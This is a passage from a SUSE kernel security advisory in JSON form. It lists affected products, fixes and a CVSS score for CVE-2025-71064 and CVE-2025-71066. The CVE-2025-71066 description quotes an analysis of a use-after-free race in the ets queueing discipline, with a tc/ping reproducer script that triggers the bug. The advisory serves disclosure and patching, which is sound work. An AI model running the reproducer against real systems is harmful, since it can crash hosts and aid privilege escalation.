"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71064",
"url": "https://www.suse.com/security/cve/CVE-2025-71064"
},
{
"category": "external",
"summary": "SUSE Bug 1256654 for CVE-2025-71064",
"url": "https://bugzilla.suse.com/1256654"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-71064"
},
{
"cve": "CVE-2025-71066",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71066"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: ets: Always remove class from active list before deleting in ets_qdisc_change\n\nzdi-disclosures@trendmicro.com says:\n\nThe vulnerability is a race condition between `ets_qdisc_dequeue` and\n`ets_qdisc_change`. It leads to UAF on `struct Qdisc` object.\nAttacker requires the capability to create new user and network namespace\nin order to trigger the bug.\nSee my additional commentary at the end of the analysis.\n\nAnalysis:\n\nstatic int ets_qdisc_change(struct Qdisc *sch, struct nlattr *opt,\n struct netlink_ext_ack *extack)\n{\n...\n\n // (1) this lock is preventing .change handler (`ets_qdisc_change`)\n //to race with .dequeue handler (`ets_qdisc_dequeue`)\n sch_tree_lock(sch);\n\n for (i = nbands; i \u003c oldbands; i++) {\n if (i \u003e= q-\u003enstrict \u0026\u0026 q-\u003eclasses[i].qdisc-\u003eq.qlen)\n list_del_init(\u0026q-\u003eclasses[i].alist);\n qdisc_purge_queue(q-\u003eclasses[i].qdisc);\n }\n\n WRITE_ONCE(q-\u003enbands, nbands);\n for (i = nstrict; i \u003c q-\u003enstrict; i++) {\n if (q-\u003eclasses[i].qdisc-\u003eq.qlen) {\n\t\t // (2) the class is added to the q-\u003eactive\n list_add_tail(\u0026q-\u003eclasses[i].alist, \u0026q-\u003eactive);\n q-\u003eclasses[i].deficit = quanta[i];\n }\n }\n WRITE_ONCE(q-\u003enstrict, nstrict);\n memcpy(q-\u003eprio2band, priomap, sizeof(priomap));\n\n for (i = 0; i \u003c q-\u003enbands; i++)\n WRITE_ONCE(q-\u003eclasses[i].quantum, quanta[i]);\n\n for (i = oldbands; i \u003c q-\u003enbands; i++) {\n q-\u003eclasses[i].qdisc = queues[i];\n if (q-\u003eclasses[i].qdisc != \u0026noop_qdisc)\n qdisc_hash_add(q-\u003eclasses[i].qdisc, true);\n }\n\n // (3) the qdisc is unlocked, now dequeue can be called in parallel\n // to the rest of .change handler\n sch_tree_unlock(sch);\n\n ets_offload_change(sch);\n for (i = q-\u003enbands; i \u003c oldbands; i++) {\n\t // (4) we\u0027re reducing the refcount for our class\u0027s qdisc and\n\t // freeing it\n qdisc_put(q-\u003eclasses[i].qdisc);\n\t // (5) If we call .dequeue between (4) and (5), we will have\n\t // a strong UAF and we can control RIP\n q-\u003eclasses[i].qdisc = NULL;\n WRITE_ONCE(q-\u003eclasses[i].quantum, 0);\n q-\u003eclasses[i].deficit = 0;\n gnet_stats_basic_sync_init(\u0026q-\u003eclasses[i].bstats);\n memset(\u0026q-\u003eclasses[i].qstats, 0, sizeof(q-\u003eclasses[i].qstats));\n }\n return 0;\n}\n\nComment:\nThis happens because some of the classes have their qdiscs assigned to\nNULL, but remain in the active list. This commit fixes this issue by always\nremoving the class from the active list before deleting and freeing its\nassociated qdisc\n\nReproducer Steps\n(trimmed version of what was sent by zdi-disclosures@trendmicro.com)\n\n```\nDEV=\"${DEV:-lo}\"\nROOT_HANDLE=\"${ROOT_HANDLE:-1:}\"\nBAND2_HANDLE=\"${BAND2_HANDLE:-20:}\" # child under 1:2\nPING_BYTES=\"${PING_BYTES:-48}\"\nPING_COUNT=\"${PING_COUNT:-200000}\"\nPING_DST=\"${PING_DST:-127.0.0.1}\"\n\nSLOW_TBF_RATE=\"${SLOW_TBF_RATE:-8bit}\"\nSLOW_TBF_BURST=\"${SLOW_TBF_BURST:-100b}\"\nSLOW_TBF_LAT=\"${SLOW_TBF_LAT:-1s}\"\n\ncleanup() {\n tc qdisc del dev \"$DEV\" root 2\u003e/dev/null\n}\ntrap cleanup EXIT\n\nip link set \"$DEV\" up\n\ntc qdisc del dev \"$DEV\" root 2\u003e/dev/null || true\n\ntc qdisc add dev \"$DEV\" root handle \"$ROOT_HANDLE\" ets bands 2 strict 2\n\ntc qdisc add dev \"$DEV\" parent 1:2 handle \"$BAND2_HANDLE\" \\\n tbf rate \"$SLOW_TBF_RATE\" burst \"$SLOW_TBF_BURST\" latency \"$SLOW_TBF_LAT\"\n\ntc filter add dev \"$DEV\" parent 1: protocol all prio 1 u32 match u32 0 0 flowid 1:2\ntc -s qdisc ls dev $DEV\n\nping -I \"$DEV\" -f -c \"$PING_COUNT\" -s \"$PING_BYTES\" -W 0.001 \"$PING_DST\" \\\n \u003e/dev/null 2\u003e\u00261 \u0026\ntc qdisc change dev \"$DEV\" root handle \"$ROOT_HANDLE\" ets bands 2 strict 0\ntc qdisc change dev \"$DEV\" root handle \"$ROOT_HANDLE\" ets bands 2 strict 2\ntc -s qdisc ls dev $DEV\ntc qdisc del dev \"$DEV\" parent \n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71066",
"url": "https://www.suse.com/security/cve/CVE-2025-71066"
},
{
"category": "external",
"summary": "SUSE Bug 1256645 for CVE-2025-71066",
"url": "https://bugzilla.suse.com/1256645"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
